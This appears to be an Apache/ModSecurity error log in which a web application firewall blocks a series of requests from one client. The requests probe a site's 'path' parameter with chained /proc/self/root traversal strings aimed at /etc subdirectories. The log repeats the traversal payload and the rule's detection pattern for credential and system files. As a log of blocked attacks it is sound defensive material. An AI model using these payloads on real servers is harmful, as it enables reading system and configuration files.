[Fri Mar 20 01:38:36.484916 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.241.31:46070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPS_XLqtnMIWvjpaJTkwAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:38:38.361331 2026] [:error] [pid 21219:tid 140411540502272] [client 74.7.241.31:43356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPTvXLqtnMIWvjpaJTmAAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:38:41.097942 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:43368] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPUfqxLDW4GITHUkSeXQAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:38:42.125783 2026] [proxy_fcgi:error] [pid 5816:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60722] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:38:43.647134 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:43374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPU-oXxyEfFpUF8f9BpQAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:38:46.331745 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.241.31:43390] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPVvqxLDW4GITHUkSeYAAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:38:48.806875 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:57858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPWOoXxyEfFpUF8f9BqAAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:38:51.382703 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.241.31:57868] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPWwkwaGbbGflqUZD_6gAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:38:54.067023 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:57876] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPXta6ubjKNq_cu4aKMwAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:38:57.895987 2026] [:error] [pid 5816:tid 140411624429312] [client 74.7.241.31:57882] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPYJfmNfuxceSuAELIigAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:38:59.493587 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:39126] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPYwkwaGbbGflqUZD_7gAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:02.247057 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.241.31:39134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPZhCii7xarUs8iHYeZQAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:04.053840 2026] [proxy_fcgi:error] [pid 21219:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:32800] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:39:04.939816 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.241.31:39146] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPaMdf6f5d65gmYZSuNAAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:07.568362 2026] [:error] [pid 5816:tid 140411699963648] [client 74.7.241.31:60630] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPa5fmNfuxceSuAELIjwAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:10.275335 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.241.31:60646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPbgkwaGbbGflqUZD_9wAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:12.915346 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.241.31:60662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPcPXLqtnMIWvjpaJTogAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:15.571566 2026] [:error] [pid 7545:tid 140411616036608] [client 74.7.241.31:60670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPc38B84UptSoTJtZDIQAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:18.259643 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.241.31:58582] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPdvXLqtnMIWvjpaJTpQAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:20.892110 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.241.31:58594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPeBCii7xarUs8iHYebAAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:23.619923 2026] [:error] [pid 8307:tid 140411641214720] [client 74.7.241.31:58608] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPe7-FhjpZGs9ba8qgJAAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:25.133813 2026] [proxy_fcgi:error] [pid 21563:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33044] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 01:39:26.350370 2026] [:error] [pid 27293:tid 140411590858496] [client 74.7.241.31:58618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPfv-YZRR_7pZ7nDLBrAAAA9I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:28.910242 2026] [:error] [pid 7545:tid 140411540502272] [client 74.7.241.31:35740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPgH8B84UptSoTJtZDJwAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 01:39:31.537931 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:35744] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzPg_qxLDW4GITHUkSecwAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
